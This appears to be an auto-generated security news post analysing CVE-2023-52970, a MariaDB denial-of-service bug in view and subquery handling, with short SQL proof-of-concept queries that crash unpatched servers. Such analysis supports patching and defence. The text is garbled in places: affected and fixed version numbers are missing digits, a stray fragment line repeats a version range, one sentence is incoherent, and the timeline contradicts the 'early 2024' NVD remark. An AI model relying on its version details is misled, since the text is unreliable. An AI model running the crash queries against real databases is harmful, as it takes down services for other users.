CVE CyberSecurity Database News

CVE-2023-52970 - Crashing MariaDB Servers via Item_direct_view_ref::derived_field_transformer_for_where – Analysis and Exploit

Poster -

MariaDB is a popular open-source database server, known for reliability and used widely in web applications. But like any complex software, sometimes it stumbles onto vulnerabilities that can be abused by attackers. One recent issue, registered as CVE-2023-52970, affects MariaDB Server 10.4 through 10.5.*, 10.6 through 10.6.*, 10.7 through 10.11.*, 11. through 11..*, and 11.1 through 11.4.*.

This post digs into how this bug can crash MariaDB, showing a simple example for understanding, possible exploit impacts, and references for deeper learning.

What is CVE-2023-52970?

CVE-2023-52970 is a denial-of-service (DoS) vulnerability found in MariaDB. It results from a flaw in the way MariaDB handles SQL queries when working with views and the function Item_direct_view_ref::derived_field_transformer_for_where.

Put simply, a specially-crafted SQL query can panic the row and field transformer code—crashing the whole server.

11.1 through 11.4.*

_All_ these releases elsewhere until their latest patched versions are vulnerable.

Exploiting the Crash (with Code Example)

The crash happens when MariaDB processes a view using Item_direct_view_ref in a WHERE clause.

Here’s a bare-minimum “exploit” SQL. It causes MariaDB to crash if it's unpatched

-- Create a test table
CREATE OR REPLACE TABLE t1(a INT);

-- Populate it with basic data
INSERT INTO t1 VALUES (1), (2);

-- Create a view referencing the table
CREATE OR REPLACE VIEW v1 AS SELECT a FROM t1;

-- Here’s the magic: a nested query referencing the view in a certain way
SELECT * FROM (SELECT a FROM v1 WHERE (SELECT a FROM v1 LIMIT 1)) AS sub;

- The process crashes, typically with a stack trace pointing to something like

  Item_direct_view_ref::derived_field_transformer_for_where
  ...
  Segmentation fault

A real-world PoC (Demo Kreek) [see also upstream bug]

DROP TABLE IF EXISTS t,c;
CREATE TABLE t(a INT);
CREATE VIEW v AS SELECT a FROM t;
SELECT (SELECT a FROM v WHERE (SELECT a FROM v LIMIT 1));

Result: The server crashes. This means any user with SELECT privileges on a database can effectively reboot MariaDB—terrible for production.

Root Cause

The problem lives in the optimizer code processing Item_direct_view_ref within specific subqueries, especially when tangled through view references. MariaDB's query planner assumes a certain setup, but the crafted query violates that, leading to a null pointer dereference and thus a server crash.

The issue was fixed by adding some logic preventing such reference mishandling in patched MariaDB versions.

Potential Impact

- Denial-of-Service: Any authenticated database user could take down the MariaDB service just by executing a query—over and over again.

No Remote Code Execution: This only causes a crash, not code execution or privilege escalation.

- Shared Hosting: If you host multiple client databases, one malicious (or even buggy!) user could crash your service for everyone.

Mitigations

- Upgrade MariaDB: Fixed in MariaDB 10.5.24, 10.6.17, 10.11.7, 11..5, and 11.1.4 (and above). See release notes.

References & More Info

- MariaDB Knowledge Base: 10.5.24 Release Notes
- Official MariaDB Security Announcements
- NVD CVE-2023-52970 Detail *(Pending full details as of early 2024)*
- Upstream Bug Tracker

Conclusion

CVE-2023-52970 is a serious but easy-to-exploit bug that can crash MariaDB upon running a simple crafted query. If you run a vulnerable version, patch as soon as possible! Restrict untrusted users until you do.

Stay safe, keep your database up-to-date, and happy querying!

*This article was prepared exclusively for educational purposes, with focus on helping sysadmins and developers understand why and how to patch their MariaDB systems.*

Timeline

Published on: 03/08/2025 23:15:14 UTC
Last modified on: 03/09/2025 21:51:34 UTC